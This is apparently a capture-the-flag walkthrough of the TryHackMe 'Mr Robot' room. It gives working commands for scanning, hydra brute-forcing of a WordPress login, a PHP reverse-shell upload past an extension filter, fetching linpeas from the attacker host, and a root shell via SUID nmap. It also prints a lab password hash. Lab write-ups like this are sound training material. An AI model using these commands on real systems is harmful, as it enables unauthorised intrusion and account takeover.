TryHackMe room link: https://tryhackme.com/room/mrrobot
Nmap initial scan
nmap -sC -sV <ip> | tee nmap.initial
Website
There is a terminal themed page.
Check robots.txt and sitemap.xml.
We find our first flag and fsocity.dic. Download fsocity.dic
fsocity.dic file
It seems like a dictionary file.
Gobuster
gobuster dir -w directory-list-2.3-medium.txt -u http://<ip> -x php, js
/wp-login /wp-includes… probably it is a wordpress site. Check /login.
WP Login
We found a login page. We can try a dictionary attack to find username using fsocity.dic file.
Username Dictionary Attack
We have to find:
- Error message when wrong username entered
- Post data parameters
- Try login with a dumb string
Error message is Invalid username
2. You can do that with using Burp but I’ll do with browser.
Open Developers Tabs > Network > Reload > POST > Request
Post parameters is log=”username”&pwd=”dumbstring”
Okay now we can run hydra with using these datas.
hydra -L fsocity.dic -p temp <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid username" -f -t 40- -L : username list
- -p : password
- -f : stop on success
- -t : threads
“ http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid username" ”
- /wp-login.php : our login page route
- log=^USER^&pwd=^PASS^ : parameters
- F= <str> : fail string is str
We found username “Elliot”.
Password Dictionary Attack
Now we have username try login with dumb password
hydra -l Elliot -P fsocity.dic <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you" -t 16
Wait a bit and get the password. Login with credentials.
wp-admin
There is a media upload section. Maybe we can upload arbitrary file
Setup a php reverse shell
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
nano shell.php
Enter your ip and local port, save the file.
Create a netcat listener on new tab.
nc -lvnp 8080
Let’s try upload it.
We got a upload filter error.
Firstly, we can try renaming to bypass.
cp shell.php shell.pngTry upload again
It worked. Luckily for us filter was very unsecure.
Go to file URL.
Remove .png and press enter.
Initial Access
We got a shell. Stabilize it.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl + Z
stty raw -echo; fg
User Privesc
Now we are a daemon. Let’s check /home
There is a user named “robot”. In /home/robot there is a password.raw-md5 file we can access its content.
robot:c3fcd3d76192e4007dfb496cca67e13bThis is a MD5 hash from the file name. Firstly, we can try CrackStation to crack the hash.
We cracked the hash. Login to robot.
su robot
We are robot now. You can read flag 2.
Privesc
Download linpeas.sh to your attacker machine.
cd /tmp; wget https://github.com/carlospolop/PEASS-ng/releases/download/20230702-bc7ce3ac/linpeas.shSetup a python http listener.
`python3 -m http.server 1337Go to the mr. robot machine and download linpeas from attacker machine. Give execution (x) permission and run it. Pipe to tee for save the output.
cd /tmp; wget http://<ip>:1337/linpeas.sh
chmod +x
./linpeas.sh | tee.out
There is a SUID bit setted nmap. We can go to GTFObins and search for nmap.
Simply create a interactive shell using nmap.
/usr/local/bin/nmap --interactive
nmap> !sh
We are root.
